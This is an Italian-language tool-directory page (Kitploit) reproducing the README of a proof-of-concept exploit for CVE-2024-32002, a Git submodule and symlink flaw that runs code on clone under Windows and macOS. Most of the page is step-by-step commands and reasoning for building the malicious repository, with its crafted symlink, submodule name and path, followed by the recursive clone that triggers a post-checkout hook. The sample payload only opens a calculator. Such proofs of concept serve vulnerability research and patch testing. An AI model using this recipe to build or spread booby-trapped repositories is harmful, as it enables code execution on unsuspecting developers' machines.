Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-32002-poc-rce — Proof-of-concept exploit per CVE-2024-32002, che dimostra l'esecuzione remota di codice tramite sottomoduli Git malevoli su filesystem case-insensitive. | Kitploit
Strumenti/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubjakob-pennington/cve-2024-32002-poc-rce

cve-2024-32002-poc-rce

Proof-of-concept exploit per CVE-2024-32002, che dimostra l'esecuzione remota di codice tramite sottomoduli Git malevoli su filesystem case-insensitive.

Vedi Repository
132 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-32002 RCE POC

Un POC per CVE-2024-32002 che dimostra l'esecuzione remota di codice (RCE).

Vedi cve-2024-32002-poc-rce per il repository del sottomodulo correlato.

Cosa contiene questo repo

  • Un symlink con un nome arbitrario che punta alla directory .git.
  • Un file .gitmodules che definisce il sottomodulo malevolo.

Come ricreare questo repo

Questo repo è stato creato su Linux (WSL2, per essere precisi). Questo è importante: il repo malevolo può essere creato solo su un filesystem sensibile alle maiuscole/minuscole.

  1. Crea un symlink, utilizzando solo caratteri minuscoli
root@kitploit:~
ln -s .git submodule

Note:

  • Il symlink dovrebbe puntare alla cartella .git, poiché è dove vogliamo scrivere i file
  • Il nome del symlink (submodule) è arbitrario, ma dovrebbe iniziare con un carattere minuscolo
  • Questo è importante, perché i caratteri minuscoli vengono prima di quelli maiuscoli nell'ordinamento. Quando la macchina che clona si confonde su dove scrivere i file del sottomodulo, vogliamo che scelga il symlink e non una directory normale.
  1. Aggiungi il sottomodulo malevolo, notando la differenza di maiuscole/minuscole nel nome della directory del sottomodulo
root@kitploit:~
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce

Note:

  • Il nome del sottomodulo ("rce/notexists") è importante, entrerà in gioco quando posizioneremo il nostro hook nel sottomodulo.
    • "rce" deve corrispondere all'ultimo segmento del percorso del sottomodulo.
    • "notexists" deve corrispondere al nome della directory che contiene hooks/post-checkout nella directory del sottomodulo. Vedi cve-2024-32002-poc-rce.
  • Anche la struttura del percorso del sottomodulo ("Submodule/modules/rce") è importante:
    • Il primo segmento del percorso del sottomodulo ("Submodule") dovrebbe corrispondere al nome del symlink sopra, differendo solo per maiuscole/minuscole.
    • Il secondo segmento ("modules") corrisponde al nome del percorso all'interno della directory .git che traccia lo stato git dei sottomoduli.
    • Il terzo segmento ("rce") deve corrispondere al primo segmento del nome del sottomodulo sopra.

Come eseguire il POC

Questa vulnerabilità colpisce solo Windows e MacOS perché entrambi hanno filesystem insensibili alle maiuscole/minuscole.

  1. Controlla se hai una versione vulnerabile di git. Vedi l'avviso di GitHub per le versioni affette.
root@kitploit:~
git --version
  1. Pensa se vuoi consapevolmente eseguire un comando che potrebbe ottenere RCE... Questo repo è benigno, ma sei sicuro?
  2. Esegui il seguente comando:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
  1. Se il POC ha funzionato, dovresti essere in grado di fare qualche calcolo!
Scarica lo strumento